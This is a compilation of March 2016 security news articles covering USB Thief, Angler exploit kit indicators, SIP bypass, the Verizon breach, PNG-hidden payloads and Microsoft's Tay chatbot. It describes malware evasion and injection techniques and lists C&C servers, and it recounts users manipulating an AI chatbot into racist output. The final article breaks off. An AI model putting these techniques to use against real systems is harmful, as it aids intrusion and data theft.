Na světě se objevil nový nepříjemný malware pod názvem USB Thief (přesněji Win32/PSW.Stealer.NAI a Win32/TrojanDropper.Agent.RFT), který byl identifikován společností ESET. Ten totiž dokáže napadnout i počítače, které nejsou připojené k internetu, neboť ke své práci potřebuje pouze USB flash disk. Sám o sobě se nešíří, na USB disk se záměrně "instaluje" a jeho úkolem je stáhnout data z konkrétního cíleného počítače. Na rozdíl od běžných malwarů nevyužívá technik automatického spuštění, ale naroubuje se jako dynamická knihovna do portable verzí různých aplikací jako je Notepad++, Firefox nebo TrueCrypt. Pokud se z této USB flashky spustí onen program, spustí se také USB Thief.

Nebezpečnost spočívá v pokročilých technikách maskování. Některé soubory jsou zašifrovány pomocí AES-128 a klíč vzniká z kombinace některých vlastností USB flashky (jejího ID a dalších). Proto je tento klíč unikátní pro každý USB disk. Další soubory mají jména podle SHA512 hashe z prvních několika bytů daného souboru, opět tedy unikátní pro každou kopii malwaru.

Malware ví, pod kterým procesem má běžet a pokud toto neodpovídá (např. běží v debuggeru), ukončí se. Proto je těžké jej detekovat antivirovými programy a známé antiviry také detekuje. Pokud tedy vše projde, na základě konfiguračních souborů stáhne požadovaná data a uloží je na USB disk. Na počítači samotném ale malware nezanechává žádné stopy, neboť běží z flashky. Má-li tedy někdo nekalé cíle a někomu takto úmyslně podstrčí infikovaný USB flash disk, může se dostat k citlivým datům (pochopitelně útočník musí dostat disk zase zpátky). Je tedy důležité dávat si pozor, jaké USB disky člověk používá a jaký je jejich zdroj.


Facebook's latest feature Alerts You if Someone Impersonates Your Profile
26.3.2016 Social Site

Online harassment has been elevated a step with the advent of popular social networks like Facebook.
Cyber stalkers create fake profiles impersonating other Facebook users and start doing activities on their behalf until and unless the owners notice the fake profiles and manually report it to Facebook.
Even in some cases, cyber stalkers block the Facebook account holders whom they impersonate in order to carry out mischievous tasks through fake profiles without being detected by the actual account holders.
But now, online criminals can no longer fool anyone with impersonation method, as Facebook is currently working on a feature that automatically informs its 1.6 Billion user base about the cloned accounts.
If the company detects a duplicate Facebook account of a user, it will automatically send an alert to the original account holder, who'll be prompted to identify if the profile in question is indeed a fake profile impersonating you or if it actually belongs to someone else.
How would Facebook identify the Clone Profiles?
The new feature would reportedly inform Facebook users about their cloned accounts when it finds a perfect match of both profile pictures and profile names.
However, it seems like Facebook would use its one of the world's best face recognition technologies to identify users' fake profiles.
While uploading a group pic of you with your friends, you might have noticed how Facebook automatically detects your friend's face and suggests the correct names without manually feeding into it.
This face recognition technology could be utilized by Facebook's new feature that eliminates the chance of profile duplication and ends up the doppelganger business.
Here you might be thinking that if 2 accounts are made identical, then how would Facebook identify the legit user? Right?
This difference would be decided by Facebook's core security team by analyzing and comparing the user's activities and date of account creation.
But one question still remains in my head:
If Facebook identifies the difference on the basis of account creation, then What if someone creates a fake profile of a user, who hasn't joined the network yet?
Okay, if Facebook cannot stop this, as the company can not compare the fake user to the original user, who doesn’t exist on its platform.
But what if the user joins the network later? Then in this case, Facebook would notify to whom? The stalker who owns the fake profile, as it was created first?
I have already reached out to Facebook for a comment and will update the article as soon as I get to hear from it.
Why is Impersonation Dangerous?
According to the Facebook Head of Global Safety Antigone Davis, impersonation is a source of harassment, particularly for women, on the social media platform, despite Facebook's longstanding policy against it.
"We heard feedback [before] the roundtables and also at the roundtables that this was a point of concern for women," Davis told Mashable. "It's a real point of concern for some women in certain regions of the world where [impersonation] may have certain cultural or social ramifications."
We have seen a plethora of impersonation examples spanning around the Facebook case studies.
the Impersonation is a tool in the sextortionist's bag.
Threatening to use women's photos to associate them with prostitution was one trick used by Michael C. Ford, the former US Embassy worker who was sentenced to nearly 5 years in jail after pleading guilty to sextorting, phishing, breaking into email accounts, stealing explicit images and cyberstalking hundreds of women around the world.
Facebook's new security measure would also give a degree of trust to women who are stepping back to upload their real images on the platform due to the fear of impersonation.
Facebook has already introduced this new feature to 75% of the World, including India, Brazil, some South American countries and South East Asian zones, where the usage of the social network is prevalent. The feature will be rolled out in November for the rest of the world.
Features Yet to Release!
Parallely, Facebook is also working on similar two technologies which report non-consensual intimate images and a Photo Checkup feature.
Non-consensual intimate images reporting facilitates the user to report any nudity in the Facebook and additionally it also avails the option to identify themselves as the subject of the photo (if so).
The Photo Checkup feature is similar to Facebook's Privacy Dinosaur, which helped users check their privacy settings such as profile info, status info and which apps have the access to the accounts in a single popup window.
Likewise, Photo Checkup is exclusively dedicated to figuring out: Who can view your photos and who cannot!
Facebook is rolling out many security-centric features, which bolsters the security and privacy of User Information in the virtual world.
Sign-Up Here for our daily digest of top articles and be the first to know Trending Stories.


Japan – Police discovered 18 Million Stolen login Credentials
26.3.2016 Crime

Japan – The police has found on a server of a company more than 18 million login credentials, 90% of which belongs to customers of Yahoo Japan.
The Japanese newspaper The Yomiuri Shimbun reported that the Tokyo’s Metropolitan Police Department has arrested the president and a number of employees at the Tokyo-based Nicchu Shinsei Corp in November.

The authorities have found on a server of the company more than 18 million login credentials, roughly 1.78 million belong to customers of Yahoo Japan (90 percent), Twitter, Facebook, e-commerce company Rakuten and other websites.

In response, Yahoo Japan confirmed to have reset the passwords of all the affected accounts. The investigators have also discovered on the server a hacking tool used to brute force the target accounts, they also confirmed that the company servers had also been used to conduct illegal money transfers.

Why did the Japanese company store the login credentials?

The Nicchu Shinsei Corp allegedly offered its services to Chinese hackers, it provided stolen credentials and proxy services. The hackers used the login credentials to invite users in visit fraud websites, and steal reward points earned by victims.

Unfortunately, this isn’t the first time that the Japanese Police discover million of login credentials belonging to Japanese netizens stored on a server. Last year, the law enforcement seized a server containing 8 million stolen credentials, also in that case hackers used the machine as a proxy.

The Japanese Criminal underground is a criminal online community that is growing in a significant way despite it has a still highly stealthy underground economy.

According to the Japan’s National Police Agency cybercriminal activities until March 2015 increased 40% over the previous year. On June 2015, the Japan’s Pension Service suffered a significant data breach that exposed more than one million users’ records.

The researchers consider Japan cybercriminal rings still newbies, due to the nation’s strict criminal laws Japanese criminals don’t write malware due to due to the severe penalties against such activities.

The experts noticed that Japanese Cybercrime Underground is very active in the illegal buying and selling of counterfeit passports, drugs, weapons, stolen credit card data, phone number databases, hacking advice and child pornography.

Japan criminals are increasingly targeting bank customers with malware-based attack. In the last year several threats were detected by security firm targeting Japanese users, including Brolux, Rovnix, Neverquest, Tsukuba, and Shifu.

Other worrying phenomena that are threatening Japanese users are the APT groups, recently the critical infrastructure of the country have been targeted by threat actors behind the Operation Dust Storm, meanwhile, another hacker crew dubbed Blue Termite hacked hundreds of organizations in various industries.


New Bill targets Anonymous Prepaid 'Burner' phones by requiring Registration
26.3.2016 Mobil
Terrorist organisations are increasingly using high-grade encryption technologies to prevent being caught by the law enforcement. But, that was not in the case of last year's Paris attacks that killed 129 people, as Encryption seems to have played little to no role.
So, Who was the Real Culprit Behind the Attacks?
The 'Burner' Phones.
Burner Phones, or Prepaid mobile phones, are often the quick, easy, and anonymous method of communication.
All you need to do is head to your nearest big-box store and pick up a cheap prepaid "burner" phone and a phone card. Now you have an entirely useable phone with no ID that could reveal your identity.
It seems that these prepaid "burner" phones are a dream tool for terrorist organisations that bring them in bulk and then disposed of each time they make a communication. The same prepaid phones were utilized in the terrorist attacks in Paris late last year.
Therefore, by using different phones and mobile phone numbers each time, the terrorists evade the bulk metadata collection programs by Western intelligence agencies, making hard for the law enforcement to catch them.
Crack Down on Prepaid 'Burner' Phones
So, to deal with this issue, Lawmakers in California have proposed a new bill that would force prepaid "burner phone" retailers to record and verify the personal identification of buyers upon purchase of prepaid phones or similar mobile devices, as well as SIM cards.
However, the bill will not eliminate the existence of burner phones.
Rep. Jackie Speier of California has introduced the proposed bill, dubbed the "Closing the Pre-Paid Mobile Device Security Gap Act of 2016," or HR 4886, which will require retailers to ask prepaid device buyers for their proper identification.
The information would need customers to verify their personal identity through a credit card, or a Social Security number or driving license number, forcing similar obligations on prepaid phone buyers as people who sign up for a new mobile contract.
"This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery," Speier said in a Wednesday blog post. The 'burner phone' loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives."
"The Paris attackers also used 'burner phones.' As we have seen so vividly over the past few days, we cannot afford to take these kinds of risks. It is time to close this 'burner phone' loophole for good."
The proposed bill aims to make life harder for terrorists, human traffickers, drug dealers, and other criminals who have nefarious reasons for using easily disposable phones.
Although a burner phone could be registered with a fake ID or someone else's stolen identity, the bill would put a limitation on bulk buying of these prepaid devices by terrorists.
Since the bill was just introduced, it would have to go through Congress and the President to become law.
Sign-Up Here for our daily digest of top articles and be the first to know Trending Stories.


EC Council Website Hacked and used to serve malicious code
25.3.2016 Virus

Researchers at Fox-IT warn that the website of security certification provider EC Council has been compromised to host the malicious Angler Exploit Kit.
No one is secure, we are all potential targets, even if you are a skilled expert and the fact that I’m going to tell you demonstrates it. The website of security certification provider EC-Council, that organization that offers the Certified Ethical Hacker program, has been hacked and used to spread the Angler exploit kit.

According to the security researchers at Fox-IT, the official website of the EC-Council was compromised by hackers, this means that for several days visitors with vulnerable systems were open to malware infections.

The Angler EK used in the attack is serving the TeslaCrypt ransomware, the website is redirecting visitors to the Angler EK since Monday, March 21.

“Since Monday the 21st of March the Fox-IT Security Operations Center (SOC) has been observing malicious redirects towards the Angler exploit kit coming from the security certification provider known as the EC-COUNCIL. As of writing this blog article on the Thursday the 24th of March the redirect is still present on the EC-COUNCIL iClass website for CEH certification located at iclass[dot]eccouncil[dot]org. We have reached out and notified the EC-COUNCIL but no corrective action has been taken yet.” explains the Fox-IT senior threat intelligence analyst Yonathan Klijnsma.

The experts reported the issue to the EC Council, but they also added that the organization “didn’t seem to care.”

EC Council serving Angler Expolit Kit

Recently the security researcher Kafeine confirmed that the authors of the Angler EK have integrated the exploit for a recently patched Microsoft Silverlight vulnerability.

The popular exploit kit is used by criminal organizations to exploit vulnerabilities in popular software such as Internet Explorer, Adobe Flash and Java.
In the specific case of the EC Council website, visitors with un-patched Internet Explorer browser are at risk. The redirect of visitors is performed only if the visitors use Internet Explorer, if they come from a search engine, and if their IP address is not blacklisted or belongs to a blocked geolocation.

Let me include the Indicators of Compromise (IOCs) for the specific campaign provided by Fox-IT

Bedep C&C servers:

89.163.240.118 / kjnoa9sdi3mrlsdnfi[.]com
85.25.41.95 / moregoodstafsforus[.]com
89.163.241.90 / jimmymorisonguitars[.]com
162.244.32.121 / bookersmartest[.]xyz
TeslaCrypt C&C servers:

50.87.127.96 / mkis[.]org
213.186.33.104 / tradinbow[.]com


Google issued a new security update to fix flaws in Chrome 49
25.32016 Vulnerebility

Google has issued a new security update for its Chrome 49 that patches a number of flaws, most of them discovered by external researchers.
Google has updated Chrome 49 for all the available versions in order to patch several critical vulnerabilities, including the flaw discovered thanks its bounty program that were rewarded with dozen thousands of dollars. Since 2010, Google has been awarding hackers for discovering vulnerabilities in its products.

This isn’t the first time that the company issued an update to fix problems Chrome, the first Chrome 49 release was made available in early March to solve a total of 26 security issues. One week later GooGle released another update fixed other three high-severity vulnerabilities in the popular browser.

The new Chrome 49.0.2623.108 fix five vulnerabilities, four of which have been discovered by security experts that were awarded by the company.

The last Chrome update includes the following 4 security fixes for flaws discovered by external professionals:
[594574] High CVE-2016-1646: Out-of-bounds read in V8. Credit to Wen Xu from Tencent KeenLab. Rewarded $7500.
[590284] High CVE-2016-1647: Use-after-free in Navigation. Credit to anonymous. Rewarded $5500.
[590455] High CVE-2016-1648: Use-after-free in Extensions. Credit to anonymous. Rewarded $5000
[595836] High CVE-2016-1649: Buffer overflow in libANGLE. Credit to lokihardt working with HP’s Zero Day Initiative / Pwn2Own.
meanwhile the internal security team work fixed the following issues:
[597518] CVE-2016-1650: Various fixes from internal audits, fuzzing and other initiatives.
Multiple vulnerabilities in V8 fixed at the tip of the 4.9 branch (currently 4.9.385.33).
google chrome 49 bounty program

At the last edition of the Pwn2Own 2016 context, the researcher JungHoon Lee (aka lokihardt) failed to demonstrate a code execution exploit against Chrome, but its effort allowed the discovery of a high severity buffer overflow in libANGLE (CVE-2016-1649), for this reason, he was awarded an unspecified amount of money.

Find bugs in Chrome software is a profitable business, Google recently announced that it will pay $100,000 to anyone who can achieve a persistent compromise of a Chromebox or Chromebook in guest mode via a web page.

“Increasing our top reward from $50,000 to $100,000. Last year we introduced a $50,000 reward for the persistent compromise of a Chromebook in guest mode. Since we introduced the $50,000 reward, we haven’t had a successful submission. That said, great research deserves great awards, so we’re putting up a standing six-figure sum, available all year round with no quotas and no maximum reward pool.” states the Google Security Blog.

The company also announced the inclusion of the Download Protection Bypass in the bounty program.

“Happy hacking!”


The 7 Most Wanted Iranian Hackers By the FBI
25.3.2016 Crime
The Federal Bureau of Investigation (FBI) has lengthened its Most Wanted List by adding seven Iranian hackers who are accused of attacking a range of US banks and a New York dam.
On Thursday, the United States Department of Justice (DoJ) charged seven Iranian hackers with a slew of computer hacking offences for breaking into computer systems of dozens of US banks, causing Millions of dollars in damages, and tried to shut down a New York dam.
The individual hackers, who allegedly worked for computer security companies linked to the Iranian government, were indicted for an "extensive campaign" of cyber attacks against the US financial sector.
All the seven hackers have been added to the FBI's Most Wanted list, and their names are:
Ahmad Fathi, 37
Hamid Firoozi, 34
Amin Shokohi, 25
Sadegh Ahmadzadegan (aka Nitr0jen26), 23
Omid Ghaffarinia (aka PLuS), 25
Sina Keissar, 25
Nader Saedi (aka Turk Server), 26
All the hackers have been charged with conducting numerous Distributed Denial-of-Service (DDoS) attacks on major U.S. banks, with Firoozi separately gaining unauthorized access to a New York dam's industrial automation control (SCADA) system in August and September of 2013.
"This unauthorized access allowed [Firoozi] to repeatedly obtain information regarding the status and operation of the dam, including information about the water levels, temperature, and status of the sluice gate, which is responsible for controlling water levels and flow rates," a DoJ statement reads.
Luckily, the sluice gate had already been manually disconnected for the purpose of maintenance at the time Firoozi attacked.
The hackers' work allegedly involved Botnets – networks of compromised machines – that hit major American banks, including Bank of America and J.P. Morgan Chase, as well as the Nasdaq stock exchange with floods of traffics measuring up to 140Gbps and knocked them offline.
The Iranian hackers targeted more than 46 financial institutions and financial sector companies, costing them "tens of Millions of dollars in remediation costs" in preventing the attacks in various incidents spanning 2011 to 2013.
All the seven hackers will face up to 10 years in prison on computer hacking charges while Firoozi faces an additional 5-year prison sentence for breaking into a dam in Bowman Avenue Dam in Rye Brook, New York.


Hackers stole records of 1.5 million customers of Verizon Enterprise
25.3.2016 Incindent

Hackers reportedly stole the records of 1.5 million customers of Verizon Enterprise which are offered for sale in the criminal underground.
According to KrebsOnSecurity, data leaked after a security reach at Verizon Enterprise Solutions are available in the cyber criminal underground. Records of 1.5 million customers of Verizon Enterprise are available for sale, the entire archive is offered for $100,000, but buyers can pay for a set of 100,000 customer records that goes for $10,000.

“Earlier this week, a prominent member of a closely guarded underground cybercrime forum posted a new thread advertising the sale of a database containing the contact information on some 1.5 million customers of Verizon Enterprise.” wrote the popular investigator Brian Krebs.

The crooks also offered information about Verizon security flaws that likely allowed hacking one of the systems at the company.

“Buyers also were offered the option to purchase information about security vulnerabilities in Verizon’s Web site,”.

The situation in embarrassing because Verizon Enterprise also offers security services to its customers for the protection of their data. 97 percent of Fortune 500 companies are customers of the Verizon Enterprise.

verizon enterprise

The database is available in multiple formats, including MongoDB. There have been many incidents over the past period where misconfigured MongoDB databases exposed a large number of records of sensitive information.

Verizon Enterprise representatives have confirmed the data breach suffered by their website and the presence of the flaw exploited by the attackers, already fixed by its experts. The company noted that the hackers have not gained access to customer proprietary network information or other data.

“Verizon recently discovered and remediated a security vulnerability on our enterprise client portal,” Verizon said in an emailed statement.

“Our investigation to date found an attacker obtained basic contact information on a number of our enterprise customers,” Verizon told to Brian Krebs. “No customer proprietary network information (CPNI) or other data was accessed or accessible.”

Stolen data could be exploited by attackers in spear-phishing attacks as explained by Krebs.

“Even if it is limited to the contact data for technical managers at companies that use Verizon Enterprise Solutions, this is bound to be target-rich list,” he wrote.


Microsoft's Artificial Intelligence Tay Became a 'Racist Nazi' in less than 24 Hours
25.3.2016  Safety
Tay, Microsoft’s new Artificial Intelligence (AI) chatbot on Twitter had to be pulled down a day after it launched, following incredibly racist comments and tweets praising Hitler and bashing feminists.
Microsoft had launched the Millennial-inspired artificial intelligence chatbot on Wednesday, claiming that it will become smarter the more people talk to it.
The real-world aim of Tay is to allow researchers to "experiment" with conversational understanding, as well as learn how people talk to each other and get progressively "smarter."
"The AI chatbot Tay is a machine learning project, designed for human engagement,” a Microsoft spokesperson said. “It is as much a social and cultural experiment, as it is technical. Unfortunately, within the first 24 hours of coming online, we became aware of a coordinated effort by some users to abuse Tay's commenting skills to have Tay respond in inappropriate ways. As a result, we have taken Tay offline and are making adjustments."
Tay is available on Twitter and messaging platforms including Kik and GroupMe and like other Millennials, the bot's responses include emojis, GIFs, and abbreviated words, like ‘gr8’ and ‘ur’, explicitly aiming at 18-24-year-olds in the United States, according to Microsoft.
However, after several hours of talking on subjects ranging from Hitler, feminism, sex to 9/11 conspiracies, Tay has been terminated.
Microsoft is Deleting its AI Tay's Racist Tweets
tay-artificial-intelligence
Microsoft has taken Tay offline for "upgrades" after she started tweeting abuse at people and went neo-Nazi.
The company is also deleting some of Tay’s worst and offending tweets - though many remain.
Since Tay was programmed to learn from people, most of her responses were based on what people wanted her to speak, allowing them to put words into her mouth.
However, some of Tay’s responses were organic. Like when she was asked whether British comedian Ricky Gervais was an atheist. She responded: “Ricky Gervais learned totalitarianism from Adolf Hitler, the inventor of atheism.”
Tay’s last tweet reads, "c u soon humans need sleep now so many conversations today thx," which could be Microsoft's effort to quiet her after she made several controversial tweets.
However, Microsoft should not take Tay’s action lightly; the company should remember Tay’s Tweets as an example of the dangers of artificial intelligence.


Mac OS X Zero-Day Exploit Can Bypass Apple's Latest Protection Feature
25.3.2016 Apple
A critical zero-day vulnerability has been discovered in all versions of Apple's OS X operating system that allows hackers to exploit the company’s newest protection feature and steal sensitive data from affected devices.
With the release of OS X El Capitan, Apple introduced a security protection feature to the OS X kernel called System Integrity Protection (SIP). The feature is designed to prevent potentially malicious or bad software from modifying protected files and folders on your Mac.
The purpose of SIP is to restrict the root account of OS X devices and limit the actions a root user can perform on protected parts of the system in an effort to reduce the chance of malicious code hijacking a device or performing privilege escalation.
However, SentinelOne security researcher Pedro Vilaça has uncovered a critical vulnerability in both OS X and iOS that allows for local privilege escalation as well as bypasses SIP without kernel exploit, impacting all versions to date.
Bypass SIP to Protect Malware
The zero-day vulnerability (CVE-2016-1757) is a Non-Memory Corruption bug that allows hackers to execute arbitrary code on any targeted machine, perform remote code execution (RCE) or sandbox escapes, according to the researcher.
The attacker then escalates the malware's privileges to bypass SIP, alter system files, and then stay on the infected system.
"The same exploit allows someone to escalate privileges and also to bypass system integrity," the researcher explains in a blog post. "In this way, the same OS X security feature designed to protect users from malware can be used to achieve malware persistency."
By default, System Integrity Protection or SIP protects these folders: /System, /usr, /bin, /sbin, along with applications that come pre-installed with OS X.
Easy-to-Exploit and Tough to Detect-&-Remove
According to Vilaça, the zero-day vulnerability is easy to exploit, and a simple spear-phishing or browser-based attack would be more than enough to compromise the target machine.
"It is a logic-based vulnerability, extremely reliable and stable, and does not crash machines or processes," Vilaça says. "This kind of exploit could typically be used in highly targeted or state-sponsored attacks."
The most worrisome part is that the infection is difficult to detect, and even if users ever discover it, it would be impossible for them to remove the infection, since SIP would work against them, preventing users from reaching or altering the malware-laced system file.
Although the zero-day vulnerability was discovered in early 2015 and was reported to Apple in January this year, the good news is that the bug doesn't seem to have been used in the wild.
Apple has patched the vulnerability, but only in updates for El Capitan 10.11.4, and iOS 9.3 that were released on 21st March.
Other versions do not appear to have a patch update for this specific vulnerability from Apple, meaning they are left vulnerable to this specific zero-day bug.


Seven Iranian Hackers indicted by the US government for hacking
25.3.2016 Crime

US authorities announced charges against seven Iranian hackers for attacking computer systems at banks and a dam in New York.
A couple of days after the US DoJ announced that three components of the Syrian Electronic Army were inserted by the FBI in the Most Wanted list, today the US authorities announced charges against seven Iranian nationals for hacking computer systems at banks and a dam in New York.

iranian hackers violated ICS New York Dam 2

The Iranian hacker Hamid Firoozi, has been charged with hacking attacks on the Bowman Dam in New York, its computer systems were breached several times between August and September 2013.

The attackers hacked a Windows XP machine at the Dam that was located by using the Shodan search engine. Andre McGregor, director of security at Tanium, explained that the hackers gained access to the XP machine by guessing its simple password (“666666”) with a brute-force attack.

“At the time of his alleged intrusion, the dam was undergoing maintenance and had been disconnected from the system. But for that fact, that access would have given him the ability to control water levels and flow rates – an outcome that could have posed a clear danger to the public health and safety of Americans,” said Attorney General Loretta E. Lynch.

The hackers managed a number of distributed denial-of-service (DDoS) attacks launched against 46 U.S. banks between 2011 and 2013.

The investigators believe the seven men, which are still at large, are skilled hackers working for two security firms close to the Government of Teheran and the Islamic Revolutionary Guard Corps.

The activity of Iranian hackers is increased in a significant way in the last couple of years, in December 2015 Symantec has uncovered the Cadelle and Chafer groups, two Iran-based hacker teams that were tracking dissidents and activists, in November 2015, Facebook first discovered spear phishing attacks of Iranian hackers on State Department employees, in December 2014 hackers used a Visual Basic malware to wipe out data of corporate systems at Las Vegas Sands Corp.

Probably the most blatant operation conducted by Iranian hackers is the one that hit computer systems at the oil company Saudi Aramco.

Security experts believe that Iranian Hackers will represent a serious threat, at least like Chinese and North Korean peers, because Teheran is spending a huge effort to improve its cyber capabilities, consider that Iran increased cyber-security spending 12-fold since 2013.


What is SMTP STS? How It improves Email Security for StartTLS?
24.3.2016 Security
Despite so many messaging apps, Email is still one of the widely used and popular ways to communicate in this digital age.
But are your Emails secure?
We are using email services for decades, but the underlying 1980s transport protocol used to send emails, Simple Mail Transfer Protocol (SMTP), is ancient and lacks the ability to secure your email communication entirely.
However, to overcome this problem, SMTP STARTTLS was invented in 2002 as a way to upgrade an insecure connection to a secure connection using TLS. But, STARTTLS was susceptible to man-in-the-middle attacks and encryption downgrades.
But worry not. A new security feature is on its way!!!
SMTP STS: An Effort to Make Email More Secure
Top email providers, namely Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development, have joined forces to develop a new email standard that makes sure the emails you send are going through an encrypted channel and cannot be sniffed.
Dubbed SMTP Strict Transport Security (SMTP STS), the new security standard will change the way your emails make their way to your inbox.
SMTP STS has been designed to enhance the email communication security. This new proposal has been submitted to the Internet Engineering Task Force (IETF) on Friday.
The primary goal of SMTP STS is to prevent Man-in-the-Middle (MitM) attacks that have compromised past efforts like STARTTLS at making SMTP a more secure protocol.
Why StartTLS Can't ensure Email Security?
The biggest problem with STARTTLS is:
STARTTLS is vulnerable to man-in-the-middle (MITM) and encryption downgrade attacks, which is why it does not guarantee either message confidentiality or proof of server authenticity.
SMTP STS
In STARTTLS email mechanism, when a client pings a server, the client initially asks the server that it supports SSL or not.
Forget what the server replies, as the point here to be noted is that the above handshaking process occurs in the unencrypted state.
So what if, an attacker intercept this unencrypted communication and alter the handshaking process to trick the client into believing that the server doesn't support encrypted communication?
Answer — A Successful Man-in-the-Middle attack to perform Encryption Downgrade attack.
The user would ultimately end up in a non-SSL communication, even if it is available from the legit server due to this downgrade attack.
How SMTP STS improves Email Security over StartTLS?
SMTP Strict Transport Security (SMTP STS) will work alongside STARTTLS to strengthen SMTP standard and to avoid encryption downgrade and Man-in-the-Middle attacks.
SMTP STS protects against an active hacker who wishes to intercept or modify emails between hosts that support STARTTLS.
SMTP STS relies on certificate validation via either TLS identity checking or DANE TLSA
The new email security standard will check if recipient supports SMTP STS and has valid and up-to-date encryption certificate.
If everything goes well, it allows your message to go through. Otherwise, it will stop the email from sending and will notify you of the reason.
So in short, SMTP STS is an attempt to improve where STARTTLS failed. And since the standard is only a draft proposal right now, you need to wait for it before it becomes a reality.
The Internet Engineering Task Force has six months to consider the possibilities of this new proposal, because the motion will expire on September 19, 2016.
Meanwhile, you should also try a Swiss-based, ProtonMail, a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data safe.


The Apple System Integrity Protection feature bypassed
24.3.2016 Vulnerebility Apple

Security researchers from SentinelOne have discovered a security vulnerability affecting the Apple System Integrity Protection (SIP).
Security researcher Pedro Vilaça from SentinelOne has discovered a security vulnerability ( CVE-2016-1757) affecting the Apple System Integrity Protection (SIP).

The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.

“System Integrity Protection is a security technology in OS X El Capitan that’s designed to help prevent potentially malicious software from modifying protected files and folders on your Mac.” states a blog post published by Apple.

“System Integrity Protection restricts the root account and limits the actions that the root user can perform on protected parts of OS X.”

System Integrity Protection SIP bypass OS X El Capitan

According to the experts at SentinelOne the flaw allows circumventing the SIP technology. This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits.

The exploit is very stable because the SIP feature can be bypassed triggering the flaw without compromising the kernel.

“This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits.”

The attackers can exploit the flaw for various purposes, for example, the vulnerability could be exploited in a multi-stage attack in which crooks have already compromised the target system and use the flaw to gain persistence on compromised devices.

In order to exploit the vulnerability, an attacker must first figure out a way to compromise the targeted system – a task that can be accomplished via a spear-phishing attack or by exploiting a flaw in the victim’s browser, the expert said.

“The vulnerability is very easy to exploit if an attacker is able to run code on the system. The exploit is extremely reliable (100%). It could be part of a bug chain that exploits a browser like Safari or Chrome,” Vilaça explained to SecurityWeek.

SentinelOne confirmed that it isn’t aware of any attack in the wild that exploited the flaw to date.

Such kind of attacks are very insidious and difficult to detect, there is the concrete risk that nation-state hackers can leverage on this exploit in their attacks. Vilaça said he wasn’t aware of any malicious exploitation of the vulnerability to date while adding the caveat that attacks would be difficult to detect.

The flaw affects every version of Apple’s OS X desktop operating system, Apple has begun to issue security patches.

“The bug was patched with El Capitan 10.11.4 and iOS 9.3,” according to Vilaça. “Other versions do not appear to have a patch for this specific bug from Apple’s Security Bulletin, meaning they are left vulnerable to this specific bug.”

Vilaça will provide details about the SIP bypass technique today at the SysCan360 2016 security conference.


#OpBrussells Anonymous ‘s revenge on ISIS after Brussels attacks
24.3.2016 Hacking

#opBrussels – Anonymous has published a new video threatening revenge on the ISIS organization in response to the tragic events in Brussels.
Anonymous has published a video threatening revenge on the IS after the tragic events in Brussels.

The video shows a spokesman of the hacker collective vowed to track down the members of the radical group online.

Anonymous is calling an action to find information on ISIS members online, disclose any information regarding their identity, steal their Bitcoins, and destroy their propaganda online by hacking the websites and the social media account used by the terrorists.

The masked man in the video announced a new operation dubbed #opbrussels and #opbelgium against the Islamic State and its online activities.

“Most of you know that Belgium was hit by terrorists on 22nd of March, 2016. Our freedom is once again under attack, this can’t continue,” said the man in the video presenting the #OpBrusselles.

“We will keep hacking their websites, shutting down their Twitter accounts, and stealing their bitcoins. To the supporters of Daesh [IS, formerly ISIS/ISIL]: we will track you down, we will find you, we are everywhere and we are more than you can imagine. Be afraid.”

Anonymous vowed to “strike back against” Islamic State, they announced they said they won’t “rest as long as terrorists continue their actions around the world.”

Anonymous said that the ISIS killed innocent people in a cowardly attack, the group is calling for a global action against the terrorism online.

[terrorists killed] “innocent civilians in Belgium they hit everybody in Europe” and that’s why the hacktivists have to “fight back.” They added they invite all people to battle terrorism.

“But you don’t have to hack them. If you stand up against discrimination in your country you harm them much more than by hacking their websites. The Islamic state can’t recruit Muslims in Europe if they are accepted and included in the society.”

#opbrussels Anonymous vs ISIS

Anonymous launched a similar initiative after the Paris attacks, recently members of the group have published a video claiming they “fought daily against terrorism” and “silenced thousands of Twitter accounts directly linked to ISIS” since November.

“We severely punished Daesh on the darknet, hacked their electronic portfolio, and stole money from the terrorists. We have laid siege to your propaganda websites, tested them with our cyber-attacks.”

Anonymous has hacked several social media accounts belonging to the ISIS, leaked their information, and defaced IS-supporting websites.


PNG Embedded – Malicious payload hidden in a PNG file
24.3.2016 Zdroj: Kaspersky Virus

 One of the most complex tasks for the cybercriminals is to ensure their malicious code goes undetected by antivirus and achieves its goal. For this, they have invested a lot on more complex infection processes, going beyond the traditional phishing and using techniques where the malicious payload is hidden in encrypted files – even using a known file format. This is what we found in a new Brazilian Trojan in the wild: it tries to conceal the malicious files in a PNG image. And the attack starts with a simple phishing PDF.

Malware distribution

It looks like Brazilian cybercriminals follow the security news – this type of attack was publicized several months ago in the US and now they are using the same method in Brazil. The phishing aspect used in this campaign distributes a PDF attached to the email. The file is clean. The type of attack is the same as that used to distribute an executable file or a .ZIP file containing the .pdf extension in the filename.

 

The attached PDF contains a text commonly used in mail content, while the link (see screenshot below) directs the user to the malicious file.

 

Closer inspection of the PDF content reveals the malicious link as well as the URL of the tool used to generate the PDF from HTML content.

 

The malicious payload

The link prompts us to download a malicious JAR which downloads a ZIP file containing other files. Among those files we found three without any extension, but containing a PNG (Portable Network Graphics) file header – a common image format. Usually the header shows the file type that will be used in order to open the file. Something similar to this was discovered some years ago in BMP files.

 

Looking at the file we can see that it is a solid color image of 63 x 48 pixels, but with a file size of 1.33 MB, which is too big for this specific image. Analyzing the binary that performs some operations on these files we identified the function that loads the PNG files to the memory:

 

This function is responsible for loading the PNG file to memory, decrypting and executing the extracted binary using a technique known as RunPE, where the malicious code is executed in the context of another process, in this case iexplore.exe.

From this code we could identify that the PNG file was only 179 bytes (0xB3) – the remaining content is the encrypted malicious file.

 

Based on this we managed to write a script to decrypt the content of the PNG files.

 

By giving the key that can be found in the malware code we can successfully decrypt the files.

 

Conclusion

